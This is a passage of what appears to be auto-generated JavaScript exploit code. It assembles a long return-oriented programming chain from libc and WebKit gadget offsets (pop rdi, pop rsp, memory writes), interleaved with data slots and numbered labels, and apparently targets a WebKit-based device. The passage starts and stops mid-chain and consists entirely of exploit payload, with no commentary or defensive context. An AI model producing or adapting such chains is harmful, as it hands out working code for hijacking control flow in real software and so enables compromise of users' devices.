set_gadget(libc_base+144605,); //pop rdi //L3655: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3656: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+213320, //L3660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213288, //L3658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+213304, //L3659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3657: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3658: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3659: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3660: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+213424, //L3663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213456, //L3665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3662: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3665: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+213568, //L3666+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+213560, //L3666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3666: db([0, 0]); // 0x0 set_gadgets([ ropchain+213584, //L3666+24 ropchain+214624, //L3661 libc_base+764760, //pop rsi ropchain+213624, //L3667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3667: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3669: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+213744, //L3672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213728, //L3670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3670: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3672: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213920, //L3675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213936, //L3676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213888, //L3673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213904, //L3674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3673: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3674: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3676: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214032, //L3678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214016, //L3677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3678: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3679: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3680: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3681: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+214232, //L3683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3683: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+214288, //L3684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3684: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+214424, //L3688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214408, //L3687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3686: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3687: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3688: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+214512, //L3689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214544, //L3691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3691: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+214616, //L3692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3692: db([0, 0]); // 0x0 //L3661: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214744, //L3695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214760, //L3696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+214728, //L3694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3695: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3696: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214920, //L3701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214936, //L3702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214872, //L3698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3698: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3699: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3700: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3702: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+215048, //L3703+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+215040, //L3703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3703: db([0, 0]); // 0x0 set_gadgets([ ropchain+215064, //L3703+24 ropchain+217960, //L3697 libc_base+764760, //pop rsi ropchain+215104, //L3704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3706: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+215224, //L3709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+215208, //L3707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3707: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3709: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+215384, //L3713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+215352, //L3711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+215368, //L3712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3710: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3711: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3713: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215440, //L3715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3715: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215568, //L3717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215584, //L3718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215552, //L3716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3716: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3717: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3718: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+215744, //L3722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+215712, //L3720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215728, //L3721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3719: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3721: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3722: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215800, //L3724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3724: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215928, //L3726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215944, //L3727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215912, //L3725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3725: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3726: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3727: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216104, //L3732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216120, //L3733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216056, //L3729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3729: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3730: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3731: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L3732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3733: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+216240, //L3734+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+216232, //L3734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3734: db([0, 0]); // 0x0 set_gadgets([ ropchain+216256, //L3734+24 ropchain+217584, //L3728 libc_base+764760, //pop rsi ropchain+216296, //L3735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3735: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3737: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+216416, //L3740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216400, //L3738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3738: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3740: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+216592, //L3743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216608, //L3744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216560, //L3741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+216576, //L3742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3741: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3743: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3744: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216704, //L3746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216688, //L3745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3745: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3746: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3747: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3748: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L3749: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3750: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3751: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L3752: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+217056, //L3754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3754: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217112, //L3755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3755: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+217192, //L3758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3758: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217248, //L3759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3759: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+217384, //L3763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217368, //L3762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3761: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3763: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+217472, //L3764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217504, //L3766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3766: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217576, //L3767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3767: db([0, 0]); // 0x0 //L3728: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217704, //L3770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217720, //L3771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+217688, //L3769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3769: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3770: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3771: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+217864, //L3774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217880, //L3775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+217832, //L3772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3772: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3773: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3774: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3775: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217952, //L3776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3776: db([0, 0]); // 0x0 //L3697: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218080, //L3779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218096, //L3780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218064, //L3778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218208, //L3782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218256, //L3785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218224, //L3783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3783: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3785: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+218368, //L3786+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+218360, //L3786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3786: db([0, 0]); // 0x0 set_gadgets([ ropchain+218384, //L3786+24 ropchain+219096, //L3781 libc_base+764760, //pop rsi ropchain+218424, //L3787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3787: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3789: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218544, //L3792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218528, //L3790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3792: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+218720, //L3795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218736, //L3796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218688, //L3793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218704, //L3794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3793: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3795: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3796: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218832, //L3798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218816, //L3797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3797: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3798: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+218920, //L3800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3799: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3800: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218976, //L3801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3801: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3803: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+219056, //L3805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3805: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L3781: //L3806: libc_base+764760, //pop rsi ropchain+219136, //L3807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3807: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3809: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219256, //L3812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219240, //L3810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3812: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+219400, //L3815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219368, //L3813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 